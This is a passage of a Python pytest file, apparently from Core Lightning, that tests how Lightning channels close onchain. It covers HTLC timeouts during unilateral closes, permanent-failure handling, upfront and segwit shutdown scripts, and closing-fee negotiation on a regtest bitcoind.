    with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
        nodes[-1].rpc.waitsendpay(h)

    # Now increment CLTV -> CLTV2
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, nodes)

    # Now, the live attempts with CLTV2 (blackholed by end nodes)
    r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
    nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
    r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
    nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])

    # We send second HTLC from different node, since they refuse to send
    # multiple with same hash.
    r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
    nodes[1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
    r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
    nodes[-2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])

    # Now increment CLTV -> CLTV3.
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, nodes)

    r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
    nodes[2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
    r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
    nodes[-3].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])

    # Make sure HTLCs have reached the end.
    nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
    nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)

    return h, nodes
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
    """Node pushes a channel onchain with multiple HTLCs with same payment_hash """
    h, nodes = setup_multihtlc_test(node_factory, bitcoind)

    mid = len(nodes) // 2

    # All channels along the line start out connected.
    for i in range(len(nodes) - 1):
        assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']

    # Now midnode goes onchain with n+1 channel.
    nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
    nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])

    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log(' to ONCHAIN')
    nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')

    # Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
    # In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
    # TODO Remove our reliance on HTLCs failing on startup and the need for
    # this plugin
    nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
    nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
    nodes[0].restart()
    nodes[-1].restart()

    # We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
    nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
    nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)

    # Wait for HTLCs to stabilize.
    nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')

    # After depth 5, midnode will spend its own to-self output.
    bitcoind.generate_block(4)
    nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                           'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # The three outgoing HTLCs time out at 21, 21 and 22 blocks.
    bitcoind.generate_block(16)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                           'OUR_UNILATERAL/OUR_HTLC')
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                           'OUR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                           'OUR_UNILATERAL/OUR_HTLC')

    # And three more for us to consider them all settled.
    bitcoind.generate_block(3)

    # Now, those nodes should have correctly failed the HTLCs
    for n in nodes[:mid - 1]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # Other timeouts are 27,27,28 blocks.
    bitcoind.generate_block(2)
    nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
    for _ in range(2):
        nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                                   'THEIR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                               'THEIR_UNILATERAL/OUR_HTLC')

    # Depth 3 to consider it settled.
    bitcoind.generate_block(3)

    for n in nodes[mid + 1:]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # At depth 100 it's all done (we didn't bother waiting for mid+1's
    # spends, so that might still be going)
    bitcoind.generate_block(97)
    nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])

    # No other channels should have failed.
    for i in range(len(nodes) - 1):
        if i != mid:
            assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
    """Node pushes a channel onchain with multiple HTLCs with same payment_hash """
    h, nodes = setup_multihtlc_test(node_factory, bitcoind)

    mid = len(nodes) // 2

    # All channels along the line start out connected.
    for i in range(len(nodes) - 1):
        assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']

    # Now midnode+1 goes onchain with midnode channel.
    nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
    nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])

    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log(' to ONCHAIN')
    nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')

    # Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
    # In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
    # TODO Remove our reliance on HTLCs failing on startup and the need for
    # this plugin
    nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
    nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
    nodes[0].restart()
    nodes[-1].restart()

    # We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
    nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
    nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)

    # Wait for HTLCs to stabilize.
    nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')

    # At depth 5, midnode+1 will spend its own to-self output.
    # NOTE(review): unlike the our_unilateral variant, no spent-output
    # argument is passed to wait_for_onchaind_broadcast here — presumably
    # it matches any OUR_DELAYED_RETURN_TO_WALLET broadcast; confirm.
    bitcoind.generate_block(4)
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')

    # The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
    bitcoind.generate_block(16)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                           'THEIR_UNILATERAL/OUR_HTLC')
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                           'THEIR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                           'THEIR_UNILATERAL/OUR_HTLC')

    # At depth 3 we consider them all settled.
    bitcoind.generate_block(3)

    # Now, those nodes should have correctly failed the HTLCs
    for n in nodes[:mid - 1]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # Other timeouts are at depths 27,27,28 blocks.
    bitcoind.generate_block(2)
    nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
    for _ in range(2):
        nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                                   'OUR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                               'OUR_UNILATERAL/OUR_HTLC')

    # At depth 3 we consider them all settled.
    bitcoind.generate_block(3)

    for n in nodes[mid + 1:]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
    bitcoind.generate_block(1)
    for _ in range(2):
        nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                                   'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
    bitcoind.generate_block(1)
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                               'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')

    # At depth 100 they're all done.
    bitcoind.generate_block(100)
    nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
    nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])

    # No other channels should have failed.
    for i in range(len(nodes) - 1):
        if i != mid:
            assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
    """Unilateral close with an unsettled INCOMING HTLC; l2 claims via preimage."""
    # Test case where we fail with unsettled incoming HTLC.
    disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options={'dev-no-reconnect': None},
                               feerates=(7500, 7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=disconnects)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fundchannel(l2, 10**6)

    # This will fail at l2's end.
    t = executor.submit(l1.pay, l2, 200000000)

    l2.daemon.wait_for_log('dev_disconnect permfail')
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Their unilateral tx, old commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')

    # l2 then gets preimage, uses it instead of ignoring
    l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
                                   'OUR_UNILATERAL/THEIR_HTLC')
    bitcoind.generate_block(1)

    # OK, l1 sees l2 fulfill htlc.
    l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
    l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
    bitcoind.generate_block(5)

    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')

    # Drop the pending pay() future.
    t.cancel()

    # Now, 100 blocks it should be done.
    bitcoind.generate_block(95)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(5)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
    """Unilateral close with an unsettled OUTGOING HTLC; l1 claims via preimage."""
    # Test case where we fail with unsettled outgoing HTLC.
    disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
    l1 = node_factory.get_node(options={'dev-no-reconnect': None})
    # Feerates identical so we don't get gratuitous commit to update them
    l2 = node_factory.get_node(disconnect=disconnects,
                               feerates=(7500, 7500, 7500, 7500))

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l2.daemon.wait_for_log('Handed peer, entering loop')
    l2.fundchannel(l1, 10**6)

    # This will fail at l2's end.
    t = executor.submit(l2.pay, l1, 200000000)

    l2.daemon.wait_for_log('dev_disconnect permfail')
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Their unilateral tx, old commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_logs([
        'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
        'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
    ])

    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')

    # l1 then gets preimage, uses it instead of ignoring
    l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
                                   'THEIR_UNILATERAL/THEIR_HTLC')

    # l2 sees l1 fulfill tx.
    bitcoind.generate_block(1)

    l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
    # Drop the pending pay() future.
    t.cancel()

    # l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
    bitcoind.generate_block(3)
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # Now, 100 blocks they should be done.
    bitcoind.generate_block(95)
    sync_blockheight(bitcoind, [l1, l2])
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
    sync_blockheight(bitcoind, [l2])
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(3)
    sync_blockheight(bitcoind, [l2])
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
    """Full life-cycle of l2's unilateral close triggered by dev_fail."""
    l1, l2 = node_factory.line_graph(2)

    # The funding change should be confirmed and our only output
    assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
    l1.pay(l2, 200000000)

    # Make sure l2 has received sig with 0 htlcs!
    l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
    l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')

    # Make sure l1 has final revocation.
    l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
    l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # We fail l2, so l1 will reconnect to it.
    l2.rpc.dev_fail(l1.info['id'])
    l2.daemon.wait_for_log('Failing due to dev-fail command')
    l2.wait_for_channel_onchain(l1.info['id'])

    # Only the close transaction should be in the mempool.
    assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1

    # Now grab the close transaction
    closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))

    # l2 will send out tx (l1 considers it a transient error)
    bitcoind.generate_block(1)

    l1.daemon.wait_for_log('Their unilateral tx, old commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')

    wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
             == ['ONCHAIN:Tracking their unilateral close',
                 'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])

    def check_billboard():
        # l2's billboard shows its own unilateral close with one unresolved
        # output awaiting the delayed-to-self spend.
        billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
        return (
            len(billboard) == 2
            and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
            and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:.*\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
        )
    wait_for(check_billboard)

    # Now, mine 4 blocks so it sends out the spending tx.
    bitcoind.generate_block(4)

    # onchaind notes to-local payment immediately.
    assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])

    # Restart, should still be confirmed (fails: unwinding blocks erases
    # the confirmation, and we don't re-make it).
    l1.restart()
    wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))

    # It should send the to-wallet tx.
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # 100 after l1 sees tx, it should be done.
    bitcoind.generate_block(95)
    wait_for(lambda: l1.rpc.listpeers()['peers'] == [])

    wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
        'ONCHAIN:Tracking our own unilateral close',
        'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
    ])

    # Now, 100 blocks l2 should be done.
    bitcoind.generate_block(5)
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])

    # Only l1 has a direct output since all of l2's outputs are respent (it
    # failed). Also the output should now be listed as confirmed since we
    # generated some more blocks.
    assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])

    # Check that the all the addresses match what we generated ourselves:
    for o in l1.rpc.listfunds()['outputs']:
        txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
        addr = scriptpubkey_addr(txout['scriptPubKey'])
        assert(addr == o['address'])

    # Sanity check: withdrawing everything still works.
    addr = l1.bitcoin.getnewaddress()
    l1.rpc.withdraw(addr, "all")
@pytest.mark.developer("needs DEVELOPER=1")
def test_shutdown(node_factory):
    """Stop a node cleanly, checking for daemon-reported memory leaks first."""
    # may_fail: the node exits before cleanup, which the harness tolerates.
    l1 = node_factory.get_node(may_fail=True)
    # Under valgrind, leak detection is valgrind's job; otherwise ask the
    # daemon itself via dev_memleak.
    if not node_factory.valgrind:
        leaks = l1.rpc.dev_memleak()['leaks']
        if leaks:
            raise Exception("Node {} has memory leaks: {}"
                            .format(l1.daemon.lightning_dir, leaks))
    l1.rpc.stop()
@flaky
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind, executor):
    """Closing must pay out to the shutdown script committed at channel open."""
    # There's a workaround in channeld, that it treats incoming errors
    # before both sides are locked in as warnings; this happens in
    # this test, so l1 reports the error as a warning!
    l1 = node_factory.get_node(start=False, allow_warning=True)
    # Insist on upfront script we're not going to match.
    l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
    l1.start()

    l2 = node_factory.get_node()
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fundchannel(l2, 1000000, False)

    # This will block, as l1 will send an error but l2 will retry.
    fut = executor.submit(l1.rpc.close, l2.info['id'])

    # l2 will close unilaterally when it dislikes shutdown script.
    l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')

    # Clear channel.
    wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
    bitcoind.generate_block(1)
    fut.result(TIMEOUT)
    wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
    wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])

    # Works when l2 closes channel, too.
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fundchannel(l2, 1000000, False)
    l2.rpc.close(l1.info['id'])

    # l2 will close unilaterally when it dislikes shutdown script.
    l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')

    # Clear channel.
    wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
    bitcoind.generate_block(1)
    wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
    wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])

    # Figure out what address it will try to use.
    keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])

    # Expect 1 for change address, plus 1 for the funding address of the actual
    # funding tx.
    addr = l1.rpc.call('dev-listaddrs', [keyidx + 2])['addresses'][-1]
    # the above used to be keyidx + 3, but that was when `fundchannel`
    # used the `txprepare`-`txdiscard`-`txprepare` trick, which skipped
    # one address in the discarded tx.
    # Now we use PSBTs, which means we never discard and skip an address.

    # Now, if we specify upfront and it's OK, all good.
    l1.stop()
    # We need to prepend the segwit version (0) and push opcode (14).
    l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
    l1.start()

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.rpc.fundchannel(l2.info['id'], 1000000)
    l1.rpc.close(l2.info['id'])
    wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_invalid_upfront_shutdown_script(node_factory, bitcoind, executor):
    """A malformed upfront shutdown script must be rejected at channel open."""
    # BUGFIX: the original created an l1/l2 pair via line_graph and then
    # immediately rebound both names to fresh nodes, leaving two spun-up
    # nodes unused — wasted startup work with no effect on the test.
    l1 = node_factory.get_node(start=False, allow_warning=True)
    # Same P2PKH script used by the upfront tests above, but with an extra
    # trailing byte appended, making it an unacceptable script.
    l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac00"
    l1.start()

    l2 = node_factory.get_node()
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    # The open must fail outright with the peer's rejection.
    with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
        l1.fundchannel(l2, 1000000, False)
@pytest.mark.developer("needs to set upfront_shutdown_script")
@pytest.mark.slow_test
def test_segwit_shutdown_script(node_factory, bitcoind, executor):
    """
    Try a range of future segwit versions as shutdown scripts. We create many nodes, so this is quite slow under valgrind
    """
    l1 = node_factory.get_node(allow_warning=True)

    # BOLT #2:
    # 5. if (and only if) `option_shutdown_anysegwit` is negotiated:
    #      * `OP_1` through `OP_16` inclusive, followed by a single push of 2 to 40 bytes
    #        (witness program versions 1 through 16)

    # Shortest (2-byte) and longest (0x28-byte) witness programs for the
    # lowest (OP_1 = 0x51) and highest (OP_16 = 0x60) allowed versions.
    edge_valid = ['51020000', '5128' + '00' * 0x28,
                  '60020000', '6028' + '00' * 0x28]
    # The same two program shapes for every version in between (OP_2..OP_15).
    other_valid = ['52020000', '5228' + '00' * 0x28,
                   '53020000', '5328' + '00' * 0x28,
                   '54020000', '5428' + '00' * 0x28,
                   '55020000', '5528' + '00' * 0x28,
                   '56020000', '5628' + '00' * 0x28,
                   '57020000', '5728' + '00' * 0x28,
                   '58020000', '5828' + '00' * 0x28,
                   '59020000', '5928' + '00' * 0x28,
                   '5A020000', '5A28' + '00' * 0x28,
                   '5B020000', '5B28' + '00' * 0x28,
                   '5C020000', '5C28' + '00' * 0x28,
                   '5D020000', '5D28' + '00' * 0x28,
                   '5E020000', '5E28' + '00' * 0x28,
                   '5F020000', '5F28' + '00' * 0x28]

    invalid = ['50020000',  # Not OP_1-OP_16
               '61020000',  # Not OP_1-OP_16
               '5102000000',  # Extra bytes
               '510100',  # Too short
               '5129' + '00' * 0x29]  # Too long

    # Don't stress CI; just test edge cases
    if SLOW_MACHINE:
        valid = edge_valid
    else:
        valid = edge_valid + other_valid

    # More efficient to create them all up-front.
    nodes = node_factory.get_nodes(len(valid) + len(invalid))

    # Give it one UTXO to spend for each node.
    addresses = {}
    for n in nodes:
        addresses[l1.rpc.newaddr()['bech32']] = (10**6 + 100000) / 10**8
    bitcoind.rpc.sendmany("", addresses)
    bitcoind.generate_block(1)
    wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == len(addresses))

    # FIXME: Since we don't support other non-v0 encodings, we need a protocol
    # test for this (we're actually testing our upfront check, not the real
    # shutdown one!),
    for script in valid:
        # Insist on upfront script we're not going to match.
        l1.stop()
        l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
        l1.start()

        l2 = nodes.pop()
        l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
        # Valid scripts (even future witness versions) must be accepted.
        l1.rpc.fundchannel(l2.info['id'], 10**6)

    for script in invalid:
        # Insist on upfront script we're not going to match.
        l1.stop()
        l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
        l1.start()

        l2 = nodes.pop()
        l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
        with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
            l1.rpc.fundchannel(l2.info['id'], 10**6)
@unittest.skipIf(not EXPERIMENTAL_FEATURES, "Needs anchor_outputs")
@pytest.mark.developer("needs to set dev-disconnect")
def test_closing_higherfee(node_factory, bitcoind, executor):
    """With anchor outputs we can ask for a *higher* fee than the last commit tx"""

    # We change the feerate before it starts negotiating close, so it aims
    # for *higher* than last commit tx.
    l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
                                               'dev-no-reconnect': None,
                                               'feerates': (7500, 7500, 7500, 7500),
                                               'disconnect': ['-WIRE_CLOSING_SIGNED']},
                                              {'may_reconnect': True,
                                               'dev-no-reconnect': None,
                                               'feerates': (7500, 7500, 7500, 7500)}])
    # This will trigger disconnect.
    fut = executor.submit(l1.rpc.close, l2.info['id'])
    l1.daemon.wait_for_log('dev_disconnect')

    # Now adjust fees so l1 asks for more on reconnect.
    l1.set_feerates((30000,) * 4, False)
    l2.set_feerates((30000,) * 4, False)
    l1.restart()
    l2.restart()

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)

    # This causes us to *exceed* previous requirements!
    l1.daemon.wait_for_log(r'deriving max fee from rate 30000 -> 16440sat \(not 1000000sat\)')

    # This will fail because l1 restarted!
    with pytest.raises(RpcError, match=r'Channel forgotten before proper close.'):
        fut.result(TIMEOUT)

    # But we still complete negotiation!
    wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
    wait_for(lambda: only_one(l2.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
@unittest.skipIf(True, "Test is extremely flaky")
@pytest.mark.developer("needs dev_disconnect")
def test_htlc_rexmit_while_closing(node_factory, executor):
    """Retranmitting an HTLC revocation while shutting down should work"""
    # FIXME: This should be in lnprototest! UNRELIABLE.
    # l1 disconnects after sending second COMMITMENT_SIGNED.
    # Then it stops receiving after sending WIRE_SHUTDOWN (which is before it
    # reads the revoke_and_ack).
    disconnects = ['+WIRE_COMMITMENT_SIGNED*2',
